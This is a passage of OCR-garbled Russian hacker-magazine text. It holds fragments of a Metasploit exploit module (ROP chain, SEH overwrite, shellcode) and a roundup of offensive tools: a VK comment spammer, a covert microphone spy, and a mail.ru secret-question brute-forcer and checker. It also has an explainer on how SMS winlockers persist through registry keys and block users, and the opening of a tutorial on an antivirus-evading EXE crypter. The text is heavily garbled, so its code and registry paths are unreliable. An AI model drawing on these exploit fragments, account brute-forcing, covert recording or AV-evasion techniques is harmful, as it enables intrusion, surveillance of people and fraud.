НН Первая строка — путь к файлу 
ааа_Чафа << "С: \\ааа\\" 


# 7. Шеллкод из метасплойта 

ааа_Чафа << эПе11соде 

# Оставшееся место заполняем 

ааа_Чафа << "а"* (Тагве{|[ '517е' ]-5Пе11соде. 1епё И) 
ааа_Чафа << "а"*328 


# Разделитель 
ааа_Чафа << "\х@00"*16 


НН Вторая строка — имя файла 
ааа_Чафа << "х"*320 

#4. Тут начинается РОП-2 
ааа_Чафа << гор_вааве*$2 

#5. Тут $Жаде 9 шеллкод 
ааа_Чафа << $Пе11_)тр 
ааа_4афа << "а"*61 


НН Продолжение имени файла, эта часть будет в стеке 
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им : 


Наш эксплойт для работы в среде метасплойта готов! 


ат РЕ ЕР РЕ ЗВ-НЕ НЫ ВЕРЕ РВ 5-Е РЕ ‚пни 


Подозрительное место в формате МММ-файла 


# триггер уязвимости 

#2. КОР-гаджет: АОБ ЕЗР, 40 / ВЕТМ 
ааа_Чафа << гор_)тр*32 

ааа_4афа << "а"*16 

#1. 5ЕН, переписанный УУУУ 
ааа_Чафа << [Фагреф.гее].раск('\') 
#3. РОП 1 — ВЕТМ 

ааа_4ата << гор_пор*10 

#4. РОП 1 — программа 

ааа_4ата << гор_вадвеф$ 

ааа_4афа << "а"*31337 


Цифры в комментариях — порядок выполнения при атаке. Остальной 
код я не буду приводить в журнале — значительно проще взять гото- 
вый модуль с нашего диска и изучать напрямую его. 


Послесловие 


Как видишь, даже в условиях с ограничениями по размеру данных в 
стеке можно написать рабочий эксплойт, который обойдет все защи- 
ты. Можно было бы воспользоваться и вариантом едд-Питщег, но это 
сильно замедляет атаку. Согеапсо@Зг обещал придумать, как ускорить 
свой вариант эксплойта с едд-Нищег’ом :]. Наш же вариант ограничен 
по размеру шеллкода в 750 байт, зато работает моментально. 

Если тебе интересна проактивная, агрессивная сторона безопас- 
ности и не только, ты хочешь поделиться своим опытом и набраться 


чужого, пообщаться с такими же, как и ты, то рекомендую принять 
участие в первой в России официальной ВЕЕСОМ-группе. Мы нахо- 
димся по адресу десоп-гизз!а.ги, и проводим локальные мероприя- 
тия (пока только в Питере}. На наших встречах будут мастер-классы 
по различным вопросам ИБ, включая и эксплойт-девелопмент, 
искусство поиска уязвимостей, вопросы \\/ЕВ-безопасности, состяза- 
ния, пиво, общение и прочие составляющие того, без чего не может 
быть ни одной хакерсокой тусовки. Наша цель — создать локальный 
Гаскегзрасе, который объединяет людей с общими интересами — ИТ, 
хакинг, программирование и т.д. Хочу сообщить, что в конце года мы 
поддержим создание первой в России, открытой, НЕЗАВИСИМОЙ и 
ДЕМОКРАТИЧНОЙ международной конференции по безопасности. 
Присоединяйся! == 
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Х-ТООЕЗ 


Программа: ХМРгоху 

ОС: М/паом$ 2000/ХР/2003 
Зегуег/М!$1а/2008 $егуег/7 
Автор: хВидо 


Работаем с прокси 


ХМРгоху — это настоящий хакерский ком- 
байн, реализующий всевозможные задачи 
по работе с прокси. Данный набор утилит 
включает в себя такие полезные программы, 
как чекер, граббер, кликер, деор и сорти- 
ровщик. 

Расскажу подробней о каждой из программ. 
® Чекер предназначен для проверки прокси- 
ков на валидность и включает в себя несколько 
окон и разделов. Работает он абсолютно тради- 
ционно: позволяет загружать списки прокси- 
серверов, чекает их в многопоточном режиме 
и сортирует сервера на «хорошие» и «плохие», 
позволяя удобно экспортировать результаты 
работы. 

® Граббер позволяет собирать списки прокси 
с различных сайтов: можно удобно доба- 
вить целую кучу сайтов, импортировав их из 
текстового файла. Все сграбленные прокси 
можно будет автоматически использовать 
для их проверки, что очень удобно. 

® Кликер — это, какясно из названия, про- 
стенький накрутчик счетчиков и всевозможных 
клик-клубов. Работает в несколько потоков, 
заходя на сайты из списка через прокси-листы. 
® Сео|Р — удобная тулза для разбиения 
проксиков по странам. Ведет лог, в котором 
выводятся строки вида «ргоху:рог{ - страна». 
® Сортировщик предназначен для быстрого 
изменения формата записи информации о 
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проксиках: например, замена проксей вида 
ххх.ххх.ххх.ххх;ххх на ххх.ххх.ххх.ххх:ххх. 
Кроме этого, он умеет удалять дубли. 

Как видно из приведенного описания 
функционала, ХМРгоху может сослужить тебе 
отличную службу в самых разнообразных 
областях Х-деятельности. 


Программа: РгохуЗосК$СгаБЪег 
ОС: *пх/мИп 
Автор: СЛуцК 


Прокси-граббер на Питоне 


В качестве противовеса предыдущему 
комбайну хочу представитьтебе маленький, 
но крайне полезный граббер проксиков и 
соксов, написанный на питоне. Источником 
для граббинга нужного нам стаффа выступает 
известный сервис зруз.ги, на котором все!р 
выложены в чистом виде, а порты зашифрова- 
ны |ауазспрГом. На данном сайте происходит 
очень частое обновление списков прокси, 
которые, как правило, забираются интересую- 
щимися людьми лишь с первой страницы, наш 
же граббер пробегает по всем семи. 
Скриптимеет два режима работы: 

1. Забираем ргоху (дгаББег.ру -10); 

2. Забираем зоск$ (дгаббег.ру -1 1). 

Результаты граббинга можно выводить 
прямиком в нужный файл с помощью пара- 
метра '-Г'. При запуске без параметров скрипт 
отрабатывает с установленными по умолчанию 
значениями. 

В качестве бонуса можно отметить тот факт, что 


для хакеров 


вся логика граббера оформлена в виде простой 
функции, которую ты легко сможешь использо- 
вать в своих проектах. 


Программа: НасК Весога Воок 
ОС:М/паом/$ 2000/ХР/2003 
Зегуег/М!$1а/2008 $егуег/7 
Автор: Кгопи$ апа $\е! 


Списываем текстовые файлы в 
утиль 


Многие изнас хранят всю свою добытую кровью 
и потом информацию в целой куче разрознен- 
ныхтекстовых файлов. Зачастую поиск в них 
нужной 5Я[-инъекции или любой другой най- 
денной тобой уязвимости [особенно, если она 
была обнаружена п-ное количество месяцев на- 
зад] может занять большое количество времени. 
Настала пора исправить это недоразумение! 
Представляю твоему вниманию прогу Наск 
Кесога Воок — удобную записную книгу для 
хранения и каталогизации найденных на сайтах 
уязвимостей. 

Функционал и особенности тулзы: 

® сохранение ссылок, описаний и даты нахож- 
дения уязвимостей; 

® сохранение ТИЦиРР (с возможностью их 
автоматического парсинга]; 

® возможность добавления личных заметок по 
текущему сайту; 

® редактирование и удаление любых записей; 
® сортировка записей по любому полю; 

® удобный поиск по базе; 

® пинглюбых ссылок: 

® горячие клавиши; 

® вывод количества записей в $а{и$ Баг; 

» шифрование хранимой в БД информации 
[шифруются иги поле тоге]:; 
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® подсветка НТТР ответов ссылок с разграниче- 
нием категорий по цветам; 

» Огад & Чгор для загрузки файла; 

® множество настроек интерфейса в зе т9д$.1пи; 
® хранение данныхв 5Я (Це; 

® работаетна.МЕТ 3.5. 

Особо стоит отметить простоту работы сзашиф- 
рованными базами: 

1. В поле «КЕ\» вводим ключ для шифрования; 
2. Выбираем файл .аБ с нужной базой; 

3. Если был введен правильный ключ, то данные 
расшифруются верно, иты сможешь работать 

с нужной базой, иначе — экран будет пустым. 
Автор программы с удовольствием выслушает 
любыетвои предложения и пожелания втопике 


Е. УДЕехрн. 


Программа: УК Маео $Зраттег 
ОС: М/паом$ 2000/ХР/2003 
Зегуег/М!$1а/2008 $егуег/7 
Автор: Й4оп 


Спамим видео во «В Контакте» 


На очереди еще один вкусный софт для работы 
с известной социальной сетью. Итак, каквидно 
из названия, УК \\9ео Зраттег — это специа- 
лизированный софт для спама в видеокоммен- 
тариях во «В Контакте». Особенности утилиты 
достаточно интересны: 


® комментирование до 50 видео на одном 
аккаунте; 

® комментирование до 59 видео у каждого 
друга этого аккаунта; 

® граббинг количества приложений; 

® граббинг количества видео; 

® граббинг количества друзей; 

® граббинг количества кумиров; 

® граббинг количества групп; 

® двойная атака на антиспам-модуль в 
контакте (добавление заданных слов в 
конец и начало твоего текста); 

® регулирование задержки постинга; 

® многопоточность; 

® поддержка антикапчи. 


Кстати, данная программа является перепи- 
санной приватной версией «\/К Комментатора», 
автор которого перестал работать над своим 
творением. 


Программа: Ме$ру++ 

ОС: М/Апдом/$ 2000/ХР/2003 
Зегуег/М!$1а/2008 $егуег/7 
Автор: Ма таге 

Пришло время для замечательной програм- 
мы, которая фактически не имеетаналогови 
занимает почетное место в арсенале каждого 
уважающего себя пранкера. 
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Шпионим за звуком 


Встречаем: микрофонный шпион Мсе$ру++ от 
известного кодера М! таге! 

Данная утилита предназначена для автомати- 
ческой записи в файл всего звука с микрофона 
и применяется в случаях, если тебе необходимо 
записать все происходящее рядом с компьюте- 
ром нужного человека. Данная утилита работа- 
етв консоли и имееттри параметра: 

1. Папка, где будут сохраняться через опреде- 
ленный промежуток времени файлы с запися- 
ми (если такой папки не существует, она будет 
создана автоматически]; 

2. Время записи одного файла в миллисекун- 
дах; 

3. Частота КН7 конвертированного \/МА-файла 
[рекомендуются значения 8, 16 или 32]. 
Принцип работы шпиона достаточно прост: че- 
рез заданный промежуток времени (например, 
каждые 10 минут} в выбранной папке создается 
\\/МА-файл с названием 03.03.2011.17.17.17. 
мгла (дата и время сохранения файла). Вес 
конечных файлов определяется по формуле: 
одна секунда = один килобайт (то есть 10 минут 
будут весить 600 Кб, полчаса — 1,8 Мб). 

Пример использования программы: 
«М!сбру++.ехе С:\гапдогт{9ег\ 1800000 16» 

— запись всего звука через микрофон каждые 
полчаса в новый файл. 

Используемые в данном примере параметры: 


С: \гапаотфо1аег\ — любая папка для 
записей; 

1800000 — полчаса в миллисекундах; 
16 — оптимальное сжатие ММА в КНЕ. 


Все свои предложения и пожелания ты можешь 
оставить в топике 5.102971. 


Программа: [птай.ги] Оче$Ноп 
Виле 

ОС: ММпдоми$ 2000/ХР/2003 
Зегуег/М$а/2008 $егуег/7 
Автор: СеаЁ 


Брутим ответы на секретные 
вопросы 


На очереди специализированная программа 
для массового подбора ответов к секретным 
вопросам на ящиках почтового сервиса га(. 
Ги. 

Функционал программы: 


® полностью синхронизированная многопо- 
точность; 

® работает через т.та11.ги (быстрота, 
стабильность); 

® встроенный генератор зоугсе-файла; 

® встроенный чекер прокси; 

® анализатор валидности списка $оигсе; 
® анализатор действий при блокировании 
со стороны та11.ги; 

® анализатор ошибок; 

® полное логирование. 


Надо заметить, что на данный момент это 
единственный рабочий брутфорс для секрет- 
ных вопросов гпац.ги. 


Программа: [тай.ги] Оцчезвоп 
СВесКег 

ОС: ММпадоми$ 2000/ХР/2003 
Зегуег/М!$а/2008 $егуег/7 
Автор: СеаЁ 


таги Фет ом едит Та 


Г] 1] | т 
т № пиры 


МНО - [тьмы] Оумененыя Спебег 1.05 оафей — 
ЕО - Софе Бу Ве. 


Чекаем секретные вопросы 


Еще одна утилита оттого же автора, на этот 
раз предназначенная для массовой про- 
верки и сохранения секретных вопросов на 
аккаунтах. 

Подходит для тех, кто любит получать до- 
ступ к мэйлам, где в качестве ответа на 
секретный вопрос стоит что-то вроде «123», 
«амиеку» ит.д. Особенности чекера такие 
же, каки у предыдущей программы, отметим 
лишь различия: 


® работа без прокси; 

® встроенный парсер логов (может 
фильтровать логи на любой вид 
вопроса, чистить или находить 
нестандартные вопросы); 

® написан на движке брута ([та11.ги] 
Оче$Е1оп Вги*е 1.04). 


Данный чекер удобно использовать вкупе с 
представленным выше мэйл-брутером. == 
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Ш № Чееоп!5 (Чееоп! @дтай.сот)] 


КАК РАБОТАЮТ 
ВИНЛОКЕРЫ? 


Чтобы узнать больше, отправь весь текст этой 
статьи На короткии номер 


© Каждый из нас сталкивался со всяческими СМС-блокерами, если 
не у себя на компьютере, то на машинах друзей. Такие штуки трудно 
назвать вирусами, но они тоже доставляют немало хлопот. Сегодня 
мы попробуем изучить приемчики кибер-мошенников, которыми они 
пользуются для отъема у населения честно заработанных денег. 


Закрепление В системе что и где отвечает за запуск программ сразу после старта 
Представим, что злая малварь уже проникла в систему. нашей любимой ОС. но я все-таки еще раз перечислю возмож- 
Наивный пользователь скачал и запустил вредоносный ные варианты. 

ехе’шник, который в первую очередь должен обеспечить себе Существуют три основных места для авторана: системный 
«нормальную» работу. Для этого программа должна прописать реестр, системные файлы со списком загружаемых программ и 


себя в автозагрузку вместе с МИпдом/5. Многие прекрасно знают, специальные папки автозагрузки. Начнем в обратном порядке. 
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НБ праненяый 300 Новы Се УАоеыия РГУИОЬГЫСНЫЕ Сео РОДРЧИО ИОЯИЕ вби ен 
СЛЕ Без Ниле 5 ЗАНИОЕСРуье От Пете 

а От бон ква Се Рори Г веиС НОЫ Тен а аньсы ныне 
Гайдн Воля С пара ыыы т 


а а май 
Ищем малварь с помощью Ргосез$ Ехрогег 


К счастью, СМС-блокерам противостоят доблестные антиви- 


русные компании, которые неустанно трудятся над добавле- 


нием сигнатур зловредов в свои базы. Это очень раздражает 
вирусописателей, ведь из-за этого они теряют свои деньги. Семейство винлокеров или, по-другому, 
Поэтому некоторые экземпляры малварь-индустрии пытаются блокеров, развивалось очень динамично 
отключить или затруднить работу аверов. Мы подробно писали на протяжении последних полутора-двух 
об этом в наших краш-тестах, поэтому — смело поднимай под- лет. Если изначально они представляли 
шивку «Хакеров» и наслаждайся. собой отдельные попытки легкого за- 

работка денег, то сейчас все это превра- 


тилось в промышленно налаженный биз- 


Папки автозагрузки известны любому пользователю. Все их № ру 
содержимое можно увидеть в главном меню \\!п4о\/$, физиче- 


нес. Самые первые версии блокеров были 
написаны крайне примитивно, обычно, 


ски же они располагаются в профилях пользователей, напри- 
мер, С: \Воситеп$ апа $е*{1п55\аЧдт1п\Главное меню\ 
Программы\Автозагрузка\. Разумеется, вместо адтип, можно 
подставить «АЦ Чзег$ или Ое!аи( Цег». 

В папки автозагрузки можно поместить как сам исполняемый 
файл, например, с помощью АР!-функции СоруЕЦе, так и ярлык 
на него. 

Всяческие вредоносные штуки редко используют это место 
для своего запуска, поскольку даже малоопытные юзеры могут 
обнаружить посторонние файлы в этих директориях. Тем не 
менее, как дополнительная гарантия своего успешного старта 
это место вполне сгодиться, так что не следует обходить его 
стороной при поиске малвари на зараженном компьютере. 
Системные файлы со списком загружаемых программ доста- 


на языках \15ца( Ваз!с или Ое[рР1. Восстановить работу \\ИпЧ9о\м/5 
можно было при помощи несложных манипуляций или исполь- 
зования специальных сочетаний клавиш. Сейчас же индустрия 
блокеров настолько эволюционировала, что файлы крайне 

редко ходят в «чистом виде» — как правило, они защищаются с 
помощью специальных крипторов/протекоров, которые также ис- 
пользуются для распространения вредоносных программ. Сама 
«начинка», естественно, не стояла на месте — в настоящее время 
применяются такие методы блокировки системы, что восстано- 
вить ее работоспособность можно только используя сторонние 
утилиты. Также я встречал блокер, который переписывал МВК 
жесткого диска и при загрузке выводилтипичное сообщение об 
оплате своих «услуг» на черном экране загрузки. Вот до чего до- 
ходят разработчики, чтобы только заполучить прибыль. 


лись в наследство современным ОС \\/\пдо\м/5 еще от их 
9х-родственниц — 98-й и 95-й винды. Первый такой файл — это 
млп.гпт, в котором есть секция [Мип4о\м/$], которая, в свою оче- 
редь, может содержать запись «гип=запускаемая_программа». 
Также существует файлик зу${ет.!пт, в секции [97\ег32] которого 
надо проверить наличие параметра вида «название_драйвера. 
уникальное_имя=путь_к драйверу». Здесь зловреды уже любят И5ег1п1{\, НКЕУ_ЕОСАЕ_МАСНТМЕ\$ОРТМАВЕ \М1сго$о++ \ 
следить гораздо больше, чем в папках автозагрузки. М1п4ом$ \СиггепЕ\ег$1оп\Кип$егу1се$\, НКЕУ _ЁОСАЕ _ 

Но лидером среди самых популярных мест для авторана являет- МАСНТМЕ\$оРмаге\М1сго$о+*\\М1пдом$ МТ\Сиггеп\/ег$1оп\ 
ся реестр \\/М пом. М1п1о50п\Мо%1+у\. Эти ветки реестра позволяют запустить 
Помимо всем известных ключей НКЕУ_СУКВЕМТ _Ч$ЕВ \ разнообразные исполняемые файлы (обычные ехе, программы, 
5о-маге\М1сго$о+{ \И\1пдом$ \СиггепЕ\ег$1оп\Кип\ и сервисы или 9]. 

НКЕУ_ЕОСАЕ _МАСНТМЕ \$оРмаге\М1сго$о+\М1п49ом$ \ Кстати, последний ключик подгружает пользовательскую ЧЦ к 
Сиггеп*\/ег$1оп\Кип\ с их братьями для одноразового запу- ехрюгег.ехе, а это значит, что код зловреда будет работать даже 
ска КипОпсе, существует еще множество всяких веток рее- в аЁе Моде. 

стра, из которых может стартовать программа. Например, Следует обратить внимание и на НКЕУ_Ё ОСА _МАСНТМЕ\ 

если ты пользуешься [Е, и он вдруг начал вести себя странно ЗОРЕТМАВЕ\М1сго$о+{\М1пдом$ МТ\СиггепЕ\Уег$1оп\Ттазе 
[показывает голых тетенек или открывает странные сайты), Е11е Ехеси%*1оп Ор%*1оп$\Имя_прогаммы\ — при запуске 


то стоит заглянуть сюда: НКЕУ_СУВКЕМТ_У$ЕВ\$о+маге\ 

М1 сго5о+* \\1паом$ \СиггепЕ\Мег1оп\Ехр1огег\Вгомзег 
Не1рег ОБ]ес*$\. Еще есть НКЕУ_ЁЕОСАЁЕ_МАСНТМЕ\$о+маге\ 
М1 сго5о+*\М1пдаом$ МТ\СиггепЕ\Мег$1оп\\М1п]о5о0п\ 
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Имя_прогаммы будет запускаться софт, указанный в строковом 
параметре ОеБиддег. Иная хитрая малварь может использовать 
ассоциации файлов в реестре. То есть, при запуске, например, 
{х-файла, будет стартовать сначала вредоносное ПО, которое 
уже потом будет запускать реальную программу, работающую 

с этим типом файлов. Также вирус может загрузиться в память 
компьютера с помощью групповых политик. За это отвечает 
ключ НКЕУ _ГОСАЁЕ_МАСНТМЕ\ $5ОРТМАКЕ \М1 сго$о+4 \И1п9ом$ \ 
СиггепЕ\ег$1оп\ро11с1ез\Ехр]1огег\Кип, в котором содер- 
жатся параметры с путями запускаемых программ. 

Вообще, мест, откуда может стартовать проникший на компью- 
тер СМС-блокер или другая зараза, много, но проверить их 
достаточно просто [если не применяются специальные техники 
маскировки], особенно если использовать специализированные 
средства, например, утилиту НЦаскТР!5$. 


Оборонительные редуты 


После того, как малварь прописала себя в автозагрузку, ей 
следует позаботиться о своей сохранности: пользователь не 
должен завершить процесс зловреда, удалить программу из 
авторана и прочее. Для этого проще всего использовать все те 
же политики безопасности \/\пЧо\\5. 

Надо сказать, что фрауд-антивирусы, которые больше ориенти- 
рованы на запад, практически не пользуются такими трюками. То 
есть, если наш отечественный СМС-блокер может напрочь пара- 
лизовать работу компьютера, то англоязычная малварь такого 
не делает. Причина, скорее всего, в том, что в тех же Штатах 
законодательство к такого рода шалостям относится гораздо 
строже. Кроме того, местные жители не платят за электронные 
услуги эсэмэсками, для этого у них есть банковские карты, а, как 
известно, \15а и Ма\егСага очень ревностно следят за поряд- 
ком среди своих клиентов. Одна гневная жалоба от доверчивого 
пользователя — и биллинг, проводящий процессинг платежей за 
Егаца Апимги$, может навсегда лишиться лицензии. 

Однако, мы отклонились от темы. Итак, что же делает типич- 
ный СМС-блокер для того, чтобы защитить себя от удаления? 
Первым делом, это — блокировка редактора реестра и диспет- 
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Борьба с блокерами от Касперского 


чера задач. Для этого надо подправить всего два параметра 

в ветке реестра НКЕУ_СУКВЕМТ_У$ЕК\$омаге\М1сго$о+* \ 
И1паом$ \ Сиггеп{\/ег$1оп\Ро11с1ез\5уз{ет. 

Первый из них — О1за {еКед!{гуТоо(5. Если присвоить ему 
значение равное 1, то гедейК.ехе не захочет запускаться. Еще 
стоит обратить внимание на параметр О!за {еКедедйц, который 
может находиться помимо НКСУ-секции еще и тут — 

НКЕМ\ $оРЕмаге\М1сго$о+\И1пдом$ \Сиггеп\/ег$1оп\Ро11с1е$ \ 
5узфет. Для запрета запуска «Диспетчера задач» используется 
параметр О1за{еТазКМог в НКСУ\$о+маге\М1сгозо+* \\1пдом$ \ 
Сиггеп*\/ег$1оп\Ро11с1ез\5у${ет. Разумеется, малварь может 
запретить запуск определенных программ. Делается это опять-таки 
через политики безопасности. Если ключ НКЕУ_СУВВЕМТ _У$ЕК\ 
5оРмаге\М1сго$о+*\и\1пдом$ \Сиггеп\Мег$1оп\Ро11с1е$\ 
Ехр1огег будет иметь параметр Ке${исКип со значением равным 
единице, а также подключен КезисКип, который содержит в себе 
список ехе-файлов, то пользователь сможет запустить только те 
программы, которые находятся в этом списке. 

Для черного списка следует использовать параметр и ключ 
О15аЦом/Кип, благодаря которым запуск определенного ПО 
станет невозможен. Уже этот набор ограничений позволяет 
малвари достаточно хорошо защитить себя от посягательств на 
свою жизнь. Даже если пытаться пробовать запустить нестан- 
дартные средства для мониторинга процессов и редактирова- 
ния реестра, то и они могут быть заблокированы с помощью 
О!заЦомКВип или Кен Кип. И это отнюдь не единственный 
способ помешать запуску чего-либо в инфицированной систе- 
ме! Например, зловред может переассоциировать запуск 
программ на себя, прописав собственное тельце в параме- 

тре по умолчанию для ключа НКЕУ_СТА$$Е$ _КООТ\ехей1е\ 
5Не11\ореп\соттапа. Или же поиграться с подключами в 

НКЕУ _ЕОСАЕ_МАСНТМЕ\ОРТМАКЕ\М1сго5$о+{\М1паом$ МТ\ 
Сиггеп*\ег$1оп\Ттаёе Е11е Ехеси{1оп Ор*%1оп$. Но, к сожа- 
лению, вышеперечисленными методами малварь не ограничи- 
вается. Создатели своего детища могут блокировать некоторые 
настройки рабочего стола, настройки отображения файлов в 
проводнике и прочее. Но это мы рассмотрим чуть ниже, вместе 
с нарушением работоспособности интернета, поскольку все эти 
трюки служат больше для запугивания пользователя, нежели 
для защиты зловреда. 


Воздействие на пользователя 


Самая главная задача мошеннического ПО — это выманить у 
пользователя определенную сумму денег. Задачу эту в какой-то 
степени можно назвать даже творческой — надо так испугать 
юзера, чтобы он, не сильно сожалея о своих кровных, отпра- 
вил СМС и при этом не решил самостоятельно избавится от 
малвари. Поэтому разработчики зловредов включают свою 
фантазию на полную катушку. Самый банальный и распростра- 
ненный прием для влияния на пользователя — это неубиваемое 
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окно. Его нельзя закрыть, нельзя свернуть, оно висит поверх 
всех остальных окон на десктопе, а в некоторых случаях оно 
даже монопольно владеет фокусом ввода. Достигнуть такого 
эффекта совсем несложно, причем используя стандартные 
средства \\\пдом/5. АР|-функция Сгеа{е\\/пдом/Ех, отвечающая 
за создание окон, имеет множество параметров, среди которых 
МЕХ е и м5 {Уе, позволяющие программистам-мошенникам 
добиться нужного эффекта. Например, передав функции в 
качестве первого аргумента значение \\/5_ЕХ_ТОРМОЗТ, мы 
заставим окно отображаться всегда поверх всех остальных 
окон, не имеющих этого атрибута, а поиграв Чм/5{у[е можно 
получить отсутствие всяческих контролов в заголовке окна или 
даже вообще избавиться от этого заголовка. 

Для того чтобы окно СМС-блокера нельзя было закрыть, обычно 
перехватывают сообщение \\/М_СТОЗЕ, из обработчика которого 
убирается стандартный код закрытия окна. Вообще, с помо- 
щью этих сообщений можно сделать много интересных вещей. 
Например, малварь может обрабатывать \/М_МОЧЗЕГЕА\УЕ и, в 
случае, если курсор мыши покидает клиентскую часть окна, воз- 
вращать его обратно. Чем сообразительней программист, тем 
больше всяких трюков он может придумать. 

Но одним только вездесущим окном дело обычно не ограни- 
чивается. Встречаются, например, экземпляры, которые меня- 
ют обои на рабочем столе. Обычно таким трюком пользуются 
антивирусы-подделки. На десктопе появляется что-то типа 
значка химического оружия и грозная надпись, а при клике по 
пустому пространству экрана открывается интернет-страница с 
предложением купить «полезное» ПО. Делается это довольно 
просто, никаких велосипедов изобретать не надо — в \п9о\5$ 
есть забытая всеми возможность выводить на рабочий стол 
определенную веб-страницу — со всеми вытекающими из этого 
последствиями. 

Мошенники могут модифицировать ярлыки на рабочем столе 
или в главном меню ОС. Детская шалость, когда в стандартном 
ярлыке к Косынке указывается путь к Саперу, может успешно 
применяться для запугивания пользователя. Если доверчивый 
юзер запускает свой любимый браузер, а вместо него появля- 
ется сообщение о том, что надо бы отправить СМС на короткий 
номер, то этот самый юзер начнет сильно нервничать, и велика 
вероятность того, что СМС все-таки уйдет по адресу. Кстати, 
если подправить Пог(си{$ в папках автозагрузки, то можно 
довольно эффективно скрыть авторан даже от продвинутых ком- 
пьютерщиков. 

Используются и более изысканные способы. Например, интер- 
фейсы \\М| позволяют приложениям получать извещения о 
запускаемых процессах (да и вообще много всякой другой 
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инфы]. Малварь может мониторить с помощью \М/М! список про- 
цессов, запущенных в системе, и при запуске нового приложе- 
ния выполнять определенные действия, например, закрывать 
вновь созданный процесс и показывать сообщение с радост- 
ным призывом заплатить и спать спокойно. Очень часто можно 
столкнуться с тем, что интернет-браузер отказывается отобра- 
жать некоторые части всемирной паутины, например, сайты 
антивирусных компаний или поисковики. Несложно догадаться, 
что это сделано для того, чтобы жертва как можно дольше 
испытывала на себе действие зловреда. 

Сделать подобную пакость можно кучей разных способов. 
Самым распространенным приемом является модификация 
файла Во${5, который находится тут %5у$етКоо{%\ у5{ет32 \ 
аг1\уегз\ефс\. Этот файл содержит базу данных доменных 
имен и используется при их трансляции в сетевые адреса 
узлов. Проще говоря, если написать там уапдех.ги и через про- 
бел !р-адрес гугла, то мы будем попадать на гугл, вводя адрес 
яндекса. Но фишка с По${5 настолько избита, что о нем знают 
даже первоклассники, ау малвари может оказаться недоста- 
точно прав для его редактирования. Поэтому следующий по 
популярности прием — это использование прокси. В настрой- 
ках браузера прописывается 1р сервера, на котором крутится 
какой-нибудь аш, который, в свою очередь, заменяет неугод- 
ные страницы чем-нибудь более полезным для мошенников. 
Достучаться до |1Е можно через его СОМ-интерфейсы, а к другим 
браузерам нужен индивидуальный подход. 

Поддельные О№$-сервера тоже неплохо справляются с зада- 
чей подмены сайтов. Правда, для этого нужны не только права 
админа в системе, но и рабочий ОМ№$-сервер. Утилита пей 
позволяет легко и просто изменить настройки подключения к 
Сети, но тру-кодеры воспользуются программными методами, 
например, все тем же \\/М|. Сделать недоступными некоторые 
серверы в интернете можно, создав специальную запись в гоще 
{аб (е. Люди могут сделать это с помощью команды гоще, а про- 
граммы юзают специальную АР! — Сгеа{ерГогмагаЕг\гу. Но в 
этом случае надо точно знать все 1р-адреса ресурса, который 
нужно сделать недоступным. Зачастую это практически невоз- 
можно [в случае с крупными сайтами типа яндекса, гугла и про- 
чих), поэтому путем модификации роутинга зло-кодеры очень 
часто просто отрубают интернет пользователю, не заморачи- 
ваясь с выборочной блокировкой. С помощью Во${$ и прокси 
можно даже организовать простенький фишинг, подменяя ори- 
гинальные страницы на очень похожие. Как вариант — просто 
выводить большими красными буквами сообщение «Отправьте 
СМС». Разумеется, подменять страницы можно не только на 
стороне сервера, но и локально, используя всеми любимые рас- 
ширения к браузерам. Например, в |Е — это широко известные 
ВНО. Незаметно установив такое расширение, можно гибко 
управлять содержимым отображаемой веб-страницы. Например, 
фрауд-антивирусы могут заменять «плохие» для сеццбя ссылки 
в выдаче поисковиков, так как обычно, если ввести название 
подобного ПО в гугле, то первый линк будет на инструкцию о 
том, как от этого ПО избавиться. 


Заключение 


В этой статье мы привели далеко не полный список трюков 

и хитростей, которые используют современные зловреды- 
мошенники. Кодеры, перешедшие на темную сторону, постоянно 
придумывают новые уловки и методы воздействия на законо- 
послушных пользователей Сети. Но имея хотя бы небольшое 
представление о том, что и как делает пресловутый СМС- 
блокер, можно уже бороться с ним. А чтобы эта борьба была как 
можно менее болезненной, очень советую всем помимо крутых 
антивирусов использовать учетную запись с урезанными права- 
ми, так как в Линуксе и МакОси вирусов нет именно потому, что 
там не сидят под рутом. 
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Вредоносные 


Создаем ЕХЕ-криптор на Ру{поп’е 


© Ме мы спасли от антивирусов несколько месяцев назад. Это было 
нетрудно — область относительно новая, не освоенная. 

С исполнимыми же файлами антивирусы борются уже 
десятилетиями. Побороть ЕХЕ-модуль будет сложнее, но... мы 


справимся :). 


Выпуск 1. Ознакомительный 


Ты уже знаешь, что я считаю антивирусы абсолютно бесполезными — 
хотя бы по той причине, что они помогают только от самых примитив- 
ных зверьков, которые в условиях современного денежного малварь- 
бизнеса встречаются не так часто. Современные злокодеры, подогре- 
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тые денежными вливаниями, научились программировать довольно 
жестко, но есть у них одна маленькая проблема — криптовка — доста- 
точно сложная штука, для написания которой нужны глубокие знания 
РЕ-формата, ассемблера и системного программирования. Из-за 
высокого «входного барьера» в этой области мало профессионалов. 
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ПРЕ ния БН. РИН Ч НЫ, РАО 


Код первой секции в О\. На картинке видим, что оригинальный код не распознался О\у, 


поскольку был заХОКен 


И найти хорошего криптора ой как сложно. 

Но решение проблемы есть! Как мы знаем, антивирус- 
ные компании обмениваются технической информаци- 
ей и создают специальные ресурсы, посредством кото- 
рых мы сами отсылаем им сэмплы (типа УгизТоаГа]). 
Но ведь и вирмейкеры тоже могут обмениваться 
информацией! Необязательно палить приватные мазы 
— публичные технологии тоже сгодятся. Например, 
было бы круто, если бы в каком-то одном месте лежали 
функции для генерации РЕ-файла, генерации импорта, 
шифрования ресурсов, рабочие функции определения 
бапаВох’ов, тогда мы могли бы создавать крипторы 

так же непринужденно, как домики из кубиков Лего. 
Идеальным местом для обмена, наверное, будет 
СиНов, и туда я залью исходники написанного нами 
сегодня криптора — он будет доступен по адресу ВИо:// 
диву. согп/ргезЧег(иа/ЕхеРаскег 

Кроме того, в решении проблемы здорово помогло бы 
использование высокоуровневых языков программиро- 
вания. В паблике сейчас валяются исходники крипто- 
ров на С++ или \Мзиа[Вазс'е, но ведь от этого проще не 
становится, поскольку разобраться в написанном коде 
— ой как непросто. На Ру{Поп’е все выглядит в разы 
лучше, поэтому именно его мы сегодня и будем исполь- 
зовать. В общем, заложим фундамент этой благородной 
миссии. Присоединяйся! 


Выпуск 2. РЕ-файл 


Структура РЕ-файла довольно сложная, поэтому под- 
робная документация будет ждать тебя на диске, а 
здесь я представлю твоему вниманию лишь избранные 
моменты. 

РЕ-файл представляет набор разных служебных струк- 
тур, связанных между собой, и набор данных, которые 
размещены в секторах. Загрузчик \\Ипдо\м/з`а читает 
структуры, обрабатывает их (например, импортирует 
Оки] и потом передает управление на инструкцию, 
указанную в поле «Етгу Рош». 

Теперь посмотрим, что же нужно нам сделать, чтобы 
изменить файл и при этом не испортить его. 


Выпуск 3. Теоретический 
криптор 

Для начала выберем файл, который будет у нас испол- 
